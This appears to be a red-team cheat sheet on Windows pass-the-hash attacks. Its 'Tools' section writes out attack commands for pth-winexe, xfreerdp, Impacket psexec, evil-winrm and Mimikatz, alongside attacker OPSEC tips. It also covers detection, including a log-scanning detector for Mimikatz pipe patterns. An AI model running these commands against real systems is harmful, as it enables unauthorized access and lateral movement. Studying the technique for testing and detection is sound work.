Pass-the-hash (PtH) attacks work against Windows systems/services that use NetNTLM authentication. The plaintext password is not needed; the NTLM hash alone is sufficient to authenticate.

Requirements

  • SMB connection
  • local admin credentials / privileges to connect to Admin$ SMB share
  • File and Print Sharing feature must be enabled
  • Local admin NTLM hash (use Mimikatz to dump)

Security Update

After the 2014 security update, PtH will work only on domain users and the built-in Administrator account (excluding other local admin accounts).

  • PtH may be detected by:
    • looking for a new R/W handle to LSASS
    • looking for echo $hex1 > \\.\pipe\$hex2 patterns in command logs, which is how Mimikatz does it
  • RTO: “Suspicious Handle to LSASS” saved search
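As an added example (not part of the original notes), a small detector for the second indicator above: it scans command-log lines for a hex blob echoed into a hex-named pipe. The log format (key=value fields) and the sample lines are constructed here, so adapt the field parsing to your own telemetry.

```python
import re

# Pattern from the notes: echo <hex> > \\.\pipe\<hex>. Case-insensitive so
# "ECHO ... \\.\PIPE\..." is caught too; whitespace around ">" is optional.
PIPE_ECHO_RE = re.compile(
    r"echo\s+([0-9a-f]+)\s*>\s*\\\\\.\\pipe\\([0-9a-f]+)",
    re.IGNORECASE,
)

# Optional context fields in the assumed key=value log format.
HOST_RE = re.compile(r"\bhost=(\S+)")
USER_RE = re.compile(r"\buser=(\S+)")

# Constructed sample log lines (not real telemetry). Lines 1 and 4 should
# alert; line 3 is a benign redirect to a file and must not.
SAMPLE_LOG = [
    "2024-01-01T10:00:01 host=WS01 user=jsmith cmd=cmd.exe /c echo 48656c6c6f > \\\\.\\pipe\\6162636465",
    "2024-01-01T10:00:02 host=WS01 user=jsmith cmd=whoami /all",
    "2024-01-01T10:00:03 host=WS02 user=svc cmd=echo hello > C:\\temp\\out.txt",
    "2024-01-01T10:00:04 host=WS03 user=admin cmd=ECHO deadbeef > \\\\.\\PIPE\\cafebabe",
]


def find_pipe_echoes(lines):
    """Return one alert dict per line matching the echo-to-named-pipe pattern."""
    hits = []
    for line in lines:
        m = PIPE_ECHO_RE.search(line)
        if not m:
            continue
        host = HOST_RE.search(line)
        user = USER_RE.search(line)
        hits.append({
            "host": host.group(1) if host else None,
            "user": user.group(1) if user else None,
            "payload_hex": m.group(1),
            # Length of the echoed blob in bytes (odd-length hex is reported as-is).
            "payload_bytes": len(m.group(1)) // 2,
            "pipe": m.group(2),
            "line": line,
        })
    return hits


if __name__ == "__main__":
    for hit in find_pipe_echoes(SAMPLE_LOG):
        print(f"[ALERT] {hit['host']} {hit['user']} pipe={hit['pipe']} "
              f"payload={hit['payload_bytes']} bytes")
```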

Some tools also ask for an LM hash. If the user has no LM hash (i.e. only an NTLM hash), use aad3b435b51404eeaad3b435b51404ee, which is the blank hash (the LM hash of the empty string).

Tools

Note: Cobalt Strike also supports PtH through its built-in Mimikatz.

# RCE, no output, Linux only
pth-winexe -U $USER%$LM_HASH:$NTLM_HASH //$HOST $CMD

# RDP
xfreerdp /v:$VICTIM_IP /u:DOMAIN\\MyUser /pth:$NTLM_HASH

# psexec.py from Impacket
psexec.py -hashes $LM_HASH:$NTLM_HASH DOMAIN/MyUser@$VICTIM_IP

# WinRM via evil-winrm
evil-winrm -i $VICTIM_IP -u MyUser -H $NTLM_HASH

# Mimikatz (pivots to the user by opening a new terminal window)
mimikatz "sekurlsa::pth /user:jsmith /domain:example.com /ntlm:aabbccddeeff..." "exit"

Warning & OPSEC

Only the Linux version of psexec supports PtH. Sometimes psexec.py will automatically elevate to NT AUTHORITY\SYSTEM when the user has enough privileges, which may not be preferable.

See also pass-the-key for Kerberos authentication.